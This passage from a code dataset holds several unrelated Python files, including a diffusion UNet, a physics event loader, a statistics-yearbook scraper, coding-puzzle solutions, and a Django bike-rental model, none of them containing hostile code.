super().__init__()\n self.down_layers = torch.nn.ModuleList(\n [\n nn.Conv2d(in_channels, 32, kernel_size=5, padding=2),\n 
nn.Conv2d(32, 64, kernel_size=5, padding=2),\n nn.Conv2d(64, 64, kernel_size=5, padding=2),\n ]\n )\n self.up_layers = torch.nn.ModuleList(\n [\n nn.Conv2d(64, 64, kernel_size=5, padding=2),\n nn.Conv2d(64, 32, kernel_size=5, padding=2),\n nn.Conv2d(32, out_channels, kernel_size=5, padding=2),\n ]\n )\n self.act = nn.SiLU()\n self.downscale = nn.MaxPool2d(2)\n self.upscale = nn.Upsample(scale_factor=2)\n\n def forward(self, x):\n h = []\n for i, l in enumerate(self.down_layers):\n x = self.act(l(x))\n if i < 2:\n h.append(x)\n x = self.downscale(x)\n\n for i, l in enumerate(self.up_layers):\n if i > 0:\n x = self.upscale(x)\n x += h.pop()\n x = self.act(l(x))\n\n return x","repo_name":"HamzaYousVision/transformers-in-vision","sub_path":"diffusion_models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16141346320","text":"import os\nfrom .ReadBinary import ReadBlock as rb\nfrom .ReadText import ReadFile as rt\nimport traceback\nimport numpy as np\n\n\nfull_loadlist = ['fastDAQ', 'slowDAQ', 'PMTtraces', 'event',\n 'camdata', 'images', 'DAQsetings']\n\n\ndef GetEvent(rundirectory, ev, *loadlist, max_file_size=None):\n event = dict()\n event_dir = os.path.join(rundirectory, str(ev))\n for key in full_loadlist:\n event[key] = dict(loaded=False)\n\n neglist = False\n if len(loadlist) == 0:\n loadlist = full_loadlist\n elif len(loadlist[0]) > 0 and loadlist[0][0:1] == '~':\n neglist = True\n\n if ('fastDAQ' in loadlist) or (neglist and '~fastDAQ' not in loadlist):\n i_file = 0\n while True:\n\n binfile = os.path.join(event_dir,\n 'fastDAQ_' + str(i_file) + '.bin')\n calfile = os.path.join(event_dir,\n 'fastDAQ_' + str(i_file) + '_cal.txt')\n\n if not (os.path.exists(binfile) and os.path.exists(calfile)):\n break\n\n try:\n d_bin = rb(binfile, max_file_size=max_file_size)\n d_cal = rt(calfile)\n d = dict()\n for key in d_bin:\n d[key] = d_bin[key] * d_cal[key + '_multiplier'] + \\\n d_cal[key + '_offset']\n if 'time' in d_bin:\n print(\"Whoa, there's a field named time in fastDAQ_\" +\n str(i_file))\n d['time'] = (range(d[list(d.keys())[0]].size) -\n d_cal['pretrigger_samples']) * d_cal['dt']\n if 'bindata' in d_bin:\n print(\"Whoa, there's a field named bindata in fastDAQ_\" +\n str(i_file))\n d['bindata'] = d_bin\n if 'caldata' in d_bin:\n print(\"Whoa, there's a field named caldata in fastDAQ_\" +\n str(i_file))\n d['caldata'] = d_cal\n\n except:\n print('Failed to load fastDAQ_' + str(i_file))\n traceback.print_exc()\n break\n\n if i_file == 0:\n event['fastDAQ'] = d\n event['fastDAQ']['multiboards'] = [d]\n else:\n event['fastDAQ']['multiboards'].append(d)\n\n event['fastDAQ']['loaded'] = True\n i_file += 1\n\n if ('slowDAQ' in loadlist) or (neglist and '~slowDAQ' not in loadlist):\n try:\n d = rt(os.path.join(event_dir, 'slowDAQ_0.txt'))\n event['slowDAQ'] = d\n event['slowDAQ']['loaded'] = True\n except:\n print('Failed to load slowDAQ_0.txt')\n traceback.print_exc()\n\n if ('PMTtraces' in loadlist) or (neglist and '~PMTtraces' not in loadlist):\n try:\n d = rb(os.path.join(event_dir, 'PMTtraces.bin'), max_file_size=max_file_size)\n event['PMTtraces'] = d\n event['PMTtraces']['loaded'] = True\n except:\n print('Failed to load PMTtraces')\n traceback.print_exc()\n\n\n if ('event' in loadlist) or (neglist and '~event' not in loadlist):\n try:\n with open(os.path.join(event_dir, 'Event.txt'), 'r') as ev_txt:\n ev_str = next(ev_txt)\n ev_dat = 
ev_str.split()\n event['event']['run_type'] = np.int32(ev_dat[2])\n event['event']['trigger_main'] = np.int32(ev_dat[3])\n event['event']['trigger_cameras'] = np.int32(ev_dat[4])\n event['event']['trigger_PLC'] = np.int32(ev_dat[5])\n event['event']['trigger_slowDAQ'] = np.int32(ev_dat[6])\n event['event']['timestamp'] = np.float64(ev_dat[7])\n event['event']['mstick'] = np.int64(ev_dat[8])\n event['event']['Pset'] = np.float64(ev_dat[9])\n event['event']['livetime'] = np.float64(ev_dat[10])\n event['event']['loaded'] = True\n except:\n print('Failed to load Event')\n traceback.print_exc()\n\n return event\n","repo_name":"SBC-Collaboration/SBC-Analysis","sub_path":"DataHandling/GetSBCEvent.py","file_name":"GetSBCEvent.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17074534284","text":"# -*- coding: utf-8 -*- \n\n\nimport time\nfrom util.utilis import *\nfrom util.logger import Logger\nimport os\nfrom selenium import webdriver\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nfrom util.utilis import *\nimport os.path as osp\n\ninfo_log = Logger('../log/guizhou_info.log','info')\nerror_log = Logger('../log/guizhou_error.log','info')\ninfo_log.logger.info('开始爬取数据了')\nerror_log.logger.error('请检查网络设置,目前断线')\nfrom bs4 import BeautifulSoup\nyear_list = sorted(list(range(2010,2020,1)),reverse =True)\ndownload_dir = os.path.abspath('./data')\noptions = webdriver.ChromeOptions()\nprefs = { 'download.default_directory': download_dir}\noptions.add_experimental_option('prefs', prefs)\ndriver = webdriver.Chrome(chrome_options=options)\n\ndef write_json(json_fn, json_dict):\n if not os.path.exists(json_fn):\n write_list = [json_dict]\n else:\n write_list = read_json(json_fn)\n write_list.append(json_dict)\n with open(json_fn, \"w\",encoding='utf-8') as f:\n json.dump(write_list, f, ensure_ascii=False,indent=4)\ndef getDonwLoadFileName(download_path, filaname, timing):\n '''\n 用于检查文件是否下载完成,当下载完成时会从这个函数跳出\n\n :param download_path: chromeDiver默认下载文件的位置\n :param row: 字典形式,由页面解析生成的,负责提供下载的文件名称信息\n :return:\n '''\n\n # document_name_zip = row['文件名称']+'.zip'\n # document_name_rar = row['文件名称']+'.rar'\n # check_down_load_path_zip = os.path.join(download_path,document_name_zip)\n # check_down_load_path_rar = os.path.join(download_path, document_name_rar)\n time_hold = 0\n while True:\n # if os.path.exists(check_down_load_path_zip):\n # document_name = document_name_zip\n # break\n # if os.path.exists(check_down_load_path_rar):\n # document_name = document_name_rar\n # break\n try:\n newest_file = newest_filename(download_path)\n finished_time = os.path.getatime(os.path.join(download_path, newest_file))\n except:\n newest_file = ''\n finished_time = 0\n if timing <= finished_time and 'download' not in newest_file and '.tmp' not in newest_file :\n time.sleep(1)\n return newest_file\n time.sleep(1)\n time_hold += 1\n if time_hold >= 50:\n error_log.logger.error('如果文件没下载完,按任意键继续;如果网络问题,请输入 quit 退出')\n a = input()\n if a == 'quit':\n return a\n # time.sleep(0.5)\n # return document_name\n\n\ndef newest_filename(path_file):\n '''\n 给定文件目录,返回最新下载的文件信息\n Args:\n path_file:文件目录\n\n Returns: File_Path\n\n '''\n lists = os.listdir(path_file)\n lists.sort(key=lambda fn: os.path.getmtime(path_file + '\\\\' + fn))\n\n return lists[-1]\n\n\n\n\ndef main():\n\n if os.path.exists('shanxi.json'):\n json_list = read_json('shanxi.json')\n else:\n json_list = []\n url_list = [\n 
'http://tjj.shaanxi.gov.cn/upload/n2020/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2020/pro/3sxtjnj/zk/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/201802/zk/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2018/7/zk/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2016/tongjinianj2016/2016/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2016/tongjinianj/2015/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2014/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2013/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2012/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2011/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2010/indexce.htm'\n ]\n for year,base_url in zip(year_list,url_list):\n\n # base_url = 'http://tjj.shaanxi.gov.cn/upload/{}/zk/indexce.htm'.format(2018)\n driver.get(base_url)\n driver.switch_to.frame(1)\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n # download_list = driver.find_elements_by_xpath(\"//table[@id='fileListTable']//a\")\n ####整个目录\n topic_list = soup.find_all('li',attrs = {'id':'foldheader'})\n\n\n for topic in topic_list:\n if topic.text == '统计图' or topic.text == '附录':\n continue\n topic_str = ''.join(topic.text.split('、')[-1].split())\n try:\n file_list = topic.find_parent().find_next_sibling('ul',attrs = {'id':'foldinglist'}).find_all('li')\n except:\n file_list = topic.find_next_sibling('ul',attrs = {'id':'foldinglist'}).find_all('li')\n tongming_num = 1\n previous_file_name = ''\n for file in file_list:\n if 'xls' in file.a.get('href') or 'xlrx' in file.a.get('href'):\n file_json = {}\n file_json['topic'] = topic_str\n file_json['info'] = {}\n\n click_name = file.text\n if len(click_name.split())>1:\n raw_file_name = click_name.split()[0]\n cur_file_name = ' '.join(click_name.split()[1:])\n else:\n raw_file_name = click_name.split()[0]\n cur_file_name = click_name.split()[-1]\n\n if '续表' in cur_file_name:\n cur_file_name = previous_file_name +'_'+ cur_file_name.replace('续表','')\n elif previous_file_name == cur_file_name:\n cur_file_name = cur_file_name + '_' + str(tongming_num)\n tongming_num += 1\n else:\n previous_file_name = cur_file_name\n tongming_num = 1\n cur_file_name = str(year)+ '_' + cur_file_name\n cur_time = time.time()\n click_button = driver.find_element_by_xpath(\"//*[text()='{}']\".format(click_name))\n click_button.click()\n latestDownloadedFileName = getDonwLoadFileName(download_dir, raw_file_name, cur_time)\n\n if latestDownloadedFileName == 'quit':\n continue\n\n path = osp.join(download_dir, latestDownloadedFileName)\n\n if osp.exists(path):\n pass\n else:\n info_log.logger('不��在这个文件:'+path)\n continue\n # raise ValueError('这文件都不存在啊')\n\n pre_name, format_name = latestDownloadedFileName.split('.')\n # new_name = cur_file_name + '.' + format_name\n newpath = osp.join(download_dir, cur_file_name + '.' 
+ format_name)\n # try:\n time.sleep(1)\n if osp.exists(newpath):\n info_log.logger.info('已经保存过这个文件了,不保存了哦!')\n continue\n os.rename(path, newpath)\n if osp.exists(newpath) and not osp.exists(path):\n info_log.logger.info('已保存:'+newpath)\n else:\n error_log.logger.error('!!!!!!!!!!!!!!!!!没找到:'+ newpath)\n error_time = 0\n while(True):\n time.sleep(1)\n error_time +=1\n if not osp.exists(path):\n break\n if error_time >=50:\n error_log.logger.error('真的rename不到文件诶')\n continue\n\n\n # time.sleep(5)\n # os.rename(path, newpath)\n # raise ValueError('这文件都不存在啊')\n # except:\n # time.sleep(2)\n # os.rename(path, newpath)\n file_json['name'] = cur_file_name\n json_list.append(file_json)\n with open('../info/shanxi.json', \"w\", encoding='utf-8') as f:\n json.dump(json_list, f, ensure_ascii=False, indent=4)\n\n del cur_file_name\n\nif __name__ == '__main__':\n main()\n","repo_name":"Gyhfresh/web-crawler-master","sub_path":"yearbook/shaanxi.py","file_name":"shaanxi.py","file_ext":"py","file_size_in_byte":8630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27440137180","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom pipeline.comparators import BaseComparator\nimport faiss\n\n\nclass TFIDFComparator(BaseComparator):\n def compare(self, query_document, documents, num_results=10):\n # Combine title and text to create documents for TF-IDF\n documents_str = documents[\"title\"] + \" \" + documents[\"text\"]\n\n # Vectorize the documents using TF-IDF\n tfidf_vectorizer = TfidfVectorizer()\n tfidf_matrix = tfidf_vectorizer.fit_transform(documents_str)\n\n # Convert TF-IDF matrix to dense vectors for FAISS\n dense_tfidf_matrix = tfidf_matrix.toarray()\n\n # Build FAISS index\n index = faiss.IndexFlatL2(dense_tfidf_matrix.shape[1])\n index.add(dense_tfidf_matrix)\n\n # Transform and preprocess the query document\n query_tfidf_vector = tfidf_vectorizer.transform([query_document]).toarray()\n\n num_results = min(num_results, len(documents_str))\n\n # Perform similarity search using FAISS\n distances, indices = index.search(query_tfidf_vector, num_results)\n\n # Retrieve the most similar documents from your DataFrame based on indices\n return documents.iloc[indices[0]]\n\n\nif __name__ == '__main__':\n test_document = \"Coronavirus was first discovered in Wuhan, China in 2019.\"\n\n documents = pd.DataFrame(columns=[\"title\", \"text\"])\n documents.loc[0] = [\"Trump\", \"Trump is the former president of the United States\"]\n documents.loc[1] = [\"Coronavirus\", \"Coronavirus is a virus that causes COVID-19\"]\n documents.loc[2] = [\"Biden\", \"Biden is the current president of the United States\"]\n\n comparator = TFIDFComparator()\n print(comparator.compare(test_document, documents))\n","repo_name":"Weikang01/fake_news_detector","sub_path":"pipeline/comparators/tfidf_comparator.py","file_name":"tfidf_comparator.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70732506087","text":"#!/usr/bin/env python3\n\nimport sys\n\nFINAL_POSITION = 4086\nDECK_SIZE = 10007\n\nDEAL_INC=\"deal with increment \"\nNEW_STACK=\"deal into new stack\"\nCUT=\"cut \"\n\ndef parse(l):\n if l.startswith(DEAL_INC):\n return (deal, [int(l[len(DEAL_INC):])])\n elif l.startswith(NEW_STACK):\n return (new_stack, [])\n elif l.startswith(CUT):\n return (cut, [int(l[len(CUT):])])\n else:\n sys.stderr.write(\"Parse error ! 
{}\\n\".format(l))\n\ndef new_stack(params):\n a,b = params\n return (-a, -b - 1)\n\ndef cut(params, n):\n a,b = params\n return (a, b - n)\n\ndef deal(params, n):\n a,b = params\n return (n * a, n * b)\n\nwith open(\"day22_i.txt\") as f:\n shuffle = [parse(l) for l in f.readlines()]\n\nab = (1, 0)\nfor op, arg in shuffle:\n ab = op(ab, *arg)\n ab = (ab[0] % DECK_SIZE, ab[1] % DECK_SIZE)\n\nprint(\"Deck shuffler equation : {} * x + {} [{}]\".format(ab[0], ab[1], DECK_SIZE))\nprint(\"Position of card 2019 after shuffling a small deck : {}\".format(\n ((ab[0] * 2019 + ab[1]) % DECK_SIZE)))\n\n\nprint(\"Upping the ante\")\nDECK_SIZE=119315717514047\nSHUFFLE_COUNT=101741582076661\nFINAL_POS=2020\n\nprint(\"New deck size : {}\".format(DECK_SIZE))\nab = (1, 0)\nfor op, arg in shuffle:\n ab = op(ab, *arg)\n ab = (ab[0] % DECK_SIZE, ab[1] % DECK_SIZE)\n\nprint(\"1xDeck shuffler equation : {} * x + {} [{}]\".format(ab[0], ab[1], DECK_SIZE))\ninv = (pow(ab[0], -1, mod=DECK_SIZE), (-ab[1] % DECK_SIZE))\nprint(\"Inverse equation : - {} * {}\".format(inv[1], inv[0]))\n\nprint(\"Position of card 2019 after shuffling a big deck once : {}\".format(\n ((ab[0] * FINAL_POS + ab[1]) % DECK_SIZE)))\npos = (ab[0] * 2019 + ab[1]) % DECK_SIZE\nant = ((pos + inv[1]) * inv[0]) % DECK_SIZE\nprint(\"Trying to revert ? {}\".format(ant))\npos = (ab[0] * pos + ab[1]) % DECK_SIZE\nprint(\"Twice : {}\".format(pos))\nant = ((pos + inv[1]) * inv[0]) % DECK_SIZE\nant = ((ant + inv[1]) * inv[0]) % DECK_SIZE\nprint(\"Revert twice: {}\".format(ant))\n\ndef rev(pos, it, ab):\n r = (pow((1 - ab[0]), -1, DECK_SIZE) * ab[1]) % DECK_SIZE\n a_n = pow(ab[0], -it, mod=DECK_SIZE)\n inv = ((pos - r) * a_n + r) % DECK_SIZE\n return inv\n\nprint(\"Trying to generic revert twice ? {}\".format(rev(15965746545382, 2, ab)))\n\n# Finally\nprint(\"Trying to revert ? {}\".format(rev(2020, SHUFFLE_COUNT, ab)))\n","repo_name":"ey3ball/adventofcode2019","sub_path":"day22/day22_2.py","file_name":"day22_2.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32133240297","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# https://www.hackerrank.com/challenges/max-array-sum\n\n# Using tabulation (bottom up approach) \n# Note that in the dp dictionary, we store the max sum for the subarray up till the length of the subarray. 
Hence, we simply return the last item in this dictionary to get the answer\n\ndef maxSubsetSum(arr):\n dp = {} # key : max index of subarray, value = sum\n dp[0], dp[1] = arr[0], max(arr[0], arr[1])\n for i, num in enumerate(arr[2:], start=2):\n dp[i] = max(dp[i-1], dp[i-2]+num, dp[i-2], num)\n return dp[len(arr)-1]\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n res = maxSubsetSum(arr)\n\n fptr.write(str(res) + '\\n')\n\n fptr.close()\n","repo_name":"Bidek56/HackerRank","sub_path":"Python/max-array-sum.py","file_name":"max-array-sum.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39874546510","text":"#!/usr/bin/python3\n\nimport yarp\nimport sys\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport os\nimport pickle\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../../ergonomic_assessment/src/')))\n\nimport AE\nimport tools\nfrom Skeleton import Skeleton\nfrom ErgoAssessment import ErgoAssessment\nfrom HumanPosture import HumanPosture\n\nclass RealTimePlotModule():\n\t\"\"\"\n\tThis module plots a bar chart with the probability distribution on the states.\n\tUsage\n\tpython plot_probabilities.py\n\tInput port: /processing/NamePort:o\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.app = pg.mkQApp()\n\t\tpg.setConfigOption('background', 'w')\n\t\tpg.setConfigOption('foreground', 'k')\n\n\t\tself.view = pg.PlotWidget()\n\t\tself.view.resize(800, 600)\n\t\tself.view.setWindowTitle('Ergonomic score in latent space')\n\t\tself.view.setAspectLocked(True)\n\t\tself.view.show()\n\n\t\tself.port = yarp.BufferedPortBottle()\n\t\tself.port.open('/plot_latentspace')\n\n\t\tmetric = 'jointAngle'\n\t\tergo_name = ['TABLE_REBA_C']\n\n\t\tsize_latent = 2\n\t\tdx = 0.1\n\n\t\tloss = [[]]\n\t\tautoencoder = []\n\n\t\tall_score = []\n\t\tall_size = []\n\t\ttype_data = []\n\t\tpath_src = \"/home/amalaise/Documents/These/code/ergo_prediction/ergonomic_assessment/src/\"\n\t\tpath = path_src + \"save/AE/\" + metric + \"/\" + str(size_latent) + '/'\n\t\tlist_files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]\n\t\tlist_files.sort()\n\t\tfile = list_files[0]\n\n\t\twith open(path + file, 'rb') as input:\n\t\t\tautoencoder = pickle.load(input)\n\n\t\tinput_data = autoencoder.get_data_test()\n\t\tdata_output, encoded_data, score = autoencoder.test_model(input_data)\n\t\tscore = autoencoder.evaluate_model(input_data, data_output, metric)\n\t\t\n\t\tMax = np.max(encoded_data, axis = 0)\n\t\tMin = np.min(encoded_data, axis = 0)\n\t\tMean = np.mean(encoded_data, axis = 0)\n\n\t\t# Compute ergo score\n\t\tergo_assessment = ErgoAssessment(path_src + 'config/rula_config.json')\n\t\tlist_ergo_score = ergo_assessment.get_list_score_name()\n\t\tlist_ergo_score.sort()\n\n\t\treduce_posture = HumanPosture(path_src + 'config/mapping_joints.json')\n\t\tposture = Skeleton('dhm66_ISB_Xsens.urdf')\n\n\t\tself.X = np.arange(0.0, 1.0+dx, dx)\n\n\t\tself.ergo_grid = np.zeros((len(self.X), len(self.X)))\n\n\t\tfor i, data_x in enumerate(self.X):\n\t\t\tfor j, data_y in enumerate(self.X):\n\n\t\t\t\tx = np.zeros((1,size_latent))\n\t\t\t\tx[0, 0] = data_x\n\t\t\t\tx[0, 1] = data_y\n\n\t\t\t\tdecoded_data = 
autoencoder.decode_data(x)\n\t\t\t\tif metric == 'posture':\n\t\t\t\t\twhole_body = reduce_posture.reduce2complete(decoded_data[0])\n\t\t\t\t\tposture.update_posture(whole_body)\n\t\t\t\telse:\n\t\t\t\t\tposture.update_posture(decoded_data[0])\n\n\t\t\t\tergo_score = tools.compute_sequence_ergo(decoded_data[0], 0, ergo_name, path_src)[0]\n\t\t\t\tif ergo_score == 1:\n\t\t\t\t\tergo_score = 1\n\t\t\t\telif 1 < ergo_score < 5:\n\t\t\t\t\tergo_score = 2\n\t\t\t\telif 4 < ergo_score < 6:\n\t\t\t\t\tergo_score = 3\n\t\t\t\telse:\n\t\t\t\t\tergo_score = 4\n\n\t\t\t\tself.ergo_grid[j,i] = ergo_score\n\n\t\tself.flag = 0\n\n\t\tself.plot_latent_space()\n\n\n\tdef plot_latent_space(self, x=0, y=0):\n\t\tif self.flag:\n\t\t\tself.view.removeItem(self.scatter)\n\t\telse:\n\t\t\tself.flag = 1\n\n\t\tself.scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=10, color='r'), symbol='o', size=1)\n\t\tplot_traj = pg.PlotItem(pen=pg.mkPen(width=5, color='r'), size=1)\n\n\t\timg_np = np.rot90(np.rot90(np.rot90(self.ergo_grid)))\n\t\t\n\t\timg = pg.ImageItem(img_np)\n\n\t\tself.scatter.setData(x=[x], y=[y])\n\t\tplot_traj.setData(x, y)\n\n\t\timg.setZValue(-100)\n\t\tself.view.addItem(img)\n\t\tself.view.addItem(self.scatter)\n\t\t\n\t\n\tdef update(self):\n\t\tb_in = self.port.read()\n\t\tdata = b_in.toString().split(' ')\n\n\t\tdel data[0]\n\n\t\tdata = list(map(float, data))\n\t\tdata = np.asarray(data)\n\n\t\tself.plot_latent_space(x=data[0]*len(self.X), y=len(self.X)-data[1]*len(self.X))\n\n\t\tQtGui.QApplication.processEvents()\n\n\t\treturn\n\n\tdef close(self):\n\t\tyarp.Network.disconnect(self.input_port, self.port.getName())\n\t\tself.port.close()\n\t\tsys.exit(self.app.exec_())\n\n\nif __name__==\"__main__\":\n\tyarp.Network.init()\n\trf = yarp.ResourceFinder()\n\trf.configure(sys.argv)\n\n\tfig = RealTimePlotModule()\n\n\twhile(True):\n\t\ttry:\n\t\t\tfig.update()\n\t\t\ti = 0\n\t\texcept KeyboardInterrupt:\n\t\t\tfig.close()\n\t\t\tbreak\n\n","repo_name":"inria-larsen/ergo_prediction","sub_path":"Modules/online_assessment/visualisation/src/plt_latent_space_online.py","file_name":"plt_latent_space_online.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18548543930","text":"from Data_Structures.graph.graph import Graph, Vertex\n\ndef test_breadth_fisrt_graph():\n g = Graph()\n node1 = g.add_node('node1')\n node2 = g.add_node('node2')\n g.add_edge(node1,node2)\n assert g.breadth_first_search(node1) == ['node1','node2']\n\ndef test_breadth_first_graph():\n g = Graph()\n node1 = g.add_node('a')\n node2 = Vertex('s')\n assert g.breadth_first_search(node2) == \"Start node does not exist\"\n","repo_name":"mhn998/-data-structures-and-algorithms","sub_path":"python/tests/challenges/test_bfs_graph.py","file_name":"test_bfs_graph.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42498649585","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef padding(img, h, w, h_, w_):\n h1 = int((h_-h)/2)\n h2 = int((h_-h)/2) + h\n w1 = int((w_-w)/2)\n w2 = int((w_-w)/2) + w\n img_pad = np.ones([h_,w_,3])*255\n img_pad[h1:h2, w1:w2, :] = img\n return img_pad\n\ndef resizeImage(img, h_, w_):\n h, w = img.shape[:2]\n if w < w_ and h < h_:\n img = padding(img, h, w, h_, w_)\n \n elif w >= w_ and h < h_:\n new_w = w_\n new_h = int(h*new_w/w)\n new_img = cv2.resize(img, (new_w, new_h), 
interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n elif w < w_ and h >= h_:\n new_h = h_\n new_w = int(w*new_h/h)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n else:\n r = max(w/w_, h/h_)\n new_w = max(min(w_, int(w / r)), 1)\n new_h = max(min(h_, int(h / r)), 1)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n return img\n\ndef preprocess(path, h, w):\n img = cv2.imread(path)\n img = resizeImage(img, h, w)\n img = np.clip(img, 0, 255)\n img = np.uint8(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n img = img.astype(np.float32)\n img = img/255\n return img","repo_name":"TismeetSingh14/HTR_V1","sub_path":"Preprocessor.py","file_name":"Preprocessor.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1815907303","text":"import json\nimport os\nimport sys\nimport codecs\nimport random\n\nstdout_encoding = sys.stdout.encoding or sys.getfilesystemencoding()\n\nf = codecs.open(\"wordlist.json\", \"r\",'utf-8')\nf2 = codecs.open(\"wordlist2_clean.json\", \"r\",'utf-8')\nf3 = codecs.open(\"wordlist3_clean.json\", \"r\",'utf-8')\n\nwordlist = json.load(f)\nwordlist2 = json.load(f2)\nwordlist3 = json.load(f3)\n\nl = list(wordlist3.keys())\n\n# for i in l:\n# if i in wordlist or i in wordlist2:\n# del wordlist3[i]\n\nc1 = [\"#db5e5e\", \"#db7d5e\", \"#dba15e\", \"#dbb85e\", \"#dbd75e\", \"#9ddb5e\"]\nc2 = [\"#5edbd5\", \"#5ea3db\", \"#5e75db\", \"#2d6acc\", \"#2248f2\", \"#7222f2\"]\nc3 = [\"#db40de\", \"#de4094\", \"#9c2754\", \"#9c2744\", \"#c42f4f\", \"#c42f2f\"]\n\nfor i in wordlist:\n wordlist[i][\"seen\"] = 0\n wordlist[i][\"mastered\"] = 0\n wordlist[i][\"color\"] = random.choice(c1)\n\nfor i in wordlist2:\n wordlist2[i][\"seen\"] = 0\n wordlist2[i][\"mastered\"] = 0\n wordlist2[i][\"color\"] = random.choice(c2)\n\nfor i in wordlist3:\n wordlist3[i][\"seen\"] = 0\n wordlist3[i][\"mastered\"] = 0\n wordlist3[i][\"color\"] = random.choice(c3)\n\nprint(wordlist3)","repo_name":"keshav99/personalsite","sub_path":"german/flashcards/clean_jsons.py","file_name":"clean_jsons.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27199906692","text":"import uuid\n\nimport requests\nfrom django.conf import settings\nfrom django.contrib.gis.measure import D\nfrom django.db import models\nfrom django.db.utils import IntegrityError\nfrom django.dispatch import receiver\nfrom django.utils.timezone import now\nfrom preferences import preferences\n\nfrom cykel.models import CykelLogEntry\n\nfrom .bike import Bike\nfrom .lock_type import LockType\nfrom .station import Station\n\n\nclass Rent(models.Model):\n rent_start = models.DateTimeField()\n rent_end = models.DateTimeField(default=None, null=True, blank=True)\n start_location = models.ForeignKey(\n \"Location\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_start_location\",\n )\n start_station = models.ForeignKey(\n \"Station\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_start_station\",\n )\n end_location = models.ForeignKey(\n \"Location\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n 
related_name=\"%(class)s_end_location\",\n )\n end_station = models.ForeignKey(\n \"Station\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_end_station\",\n )\n bike = models.ForeignKey(\"Bike\", default=None, on_delete=models.PROTECT)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT)\n\n def __repr__(self):\n return \"\"\"Rent #{id}: Bike {bike} for User '{user}'\\n rented {rent_start}\n from {start_location}/{start_station}\\n return {rent_end}\n at {end_location}/{end_station}\"\"\".format(\n id=self.id,\n bike=self.bike,\n user=self.user,\n start_location=self.start_location,\n start_station=self.start_station,\n rent_start=self.rent_start,\n end_location=self.end_location,\n end_station=self.end_station,\n rent_end=self.rent_end,\n )\n\n def unlock(self):\n if self.bike.lock is None:\n return {}\n\n lock = self.bike.lock\n lock_type = lock.lock_type\n\n if lock_type is None:\n return {}\n\n if lock_type.form_factor == LockType.FormFactor.COMBINATION_LOCK:\n return {\"unlock_key\": self.bike.lock.unlock_key}\n\n if lock_type.form_factor == LockType.FormFactor.ELECTRONIC_LOCK:\n url = \"{url}/{device_id}/unlock\".format(\n url=lock_type.endpoint_url, device_id=lock.lock_id\n )\n r = requests.post(url)\n data = r.json()\n return {\"data\": data}\n\n return {}\n\n def end(self, end_location=None, force=False):\n self.rent_end = now()\n if end_location:\n self.end_location = end_location\n elif self.bike.public_geolocation():\n self.end_location = self.bike.public_geolocation()\n\n self.save()\n\n if self.end_location:\n # attach bike to station if location is closer than X meters\n # distance is configured in preferences\n max_distance = preferences.BikeSharePreferences.station_match_max_distance\n station_closer_than_Xm = Station.objects.filter(\n location__distance_lte=(self.end_location.geo, D(m=max_distance)),\n status=Station.Status.ACTIVE,\n ).first()\n if 